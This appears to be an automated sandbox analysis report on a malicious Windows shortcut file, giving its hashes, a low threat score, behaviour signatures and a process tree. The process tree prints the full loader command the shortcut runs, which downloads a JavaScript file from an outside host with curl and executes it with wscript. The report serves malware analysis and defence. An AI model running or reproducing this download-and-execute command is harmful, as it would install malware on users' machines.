Analysis
-
max time kernel
38s -
max time network
41s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
08-09-2022 18:57
Static task
static1
Behavioral task
behavioral1
Sample
doc/Valid155.lnk
Resource
win7-20220812-en
windows7-x64
2 signatures
150 seconds
General
-
Target
doc/Valid155.lnk
-
Size
2KB
-
MD5
41c12342c2571e0030be5e2d167a836e
-
SHA1
a54d3181fddc3ab15cb482865a255a74052c4e56
-
SHA256
2b692ca392558fca23f219383cc7c23c4b3dca641a3e49c9b48f096df091273e
-
SHA512
4aeb1575dd294455b9f585b618ce7d3526e771a5fc98ea22b3231c5cc253e9f3bd2e0adfc4aefe4f566d62955f2cfe565ea5099f19bea6b908490f2ec7d8a42e
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 1764 wrote to memory of 1980 1764 cmd.exe cmd.exe PID 1764 wrote to memory of 1980 1764 cmd.exe cmd.exe PID 1764 wrote to memory of 1980 1764 cmd.exe cmd.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\doc\Valid155.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /q /c echo 'HI_U' && MD "C:\Users\Admin\AppData\Local\ur\B4O" && curl.exe --output C:\Users\Admin\AppData\Local\ur\B4O\enhrP.s_1L.QH0w.js https://purepowerinc.net/nluGZ/082.html && cd "C:\Users\Admin\AppData\Local\ur\B4O" && wscript enhrP.s_1L.QH0w.js && echo "Nj"2⤵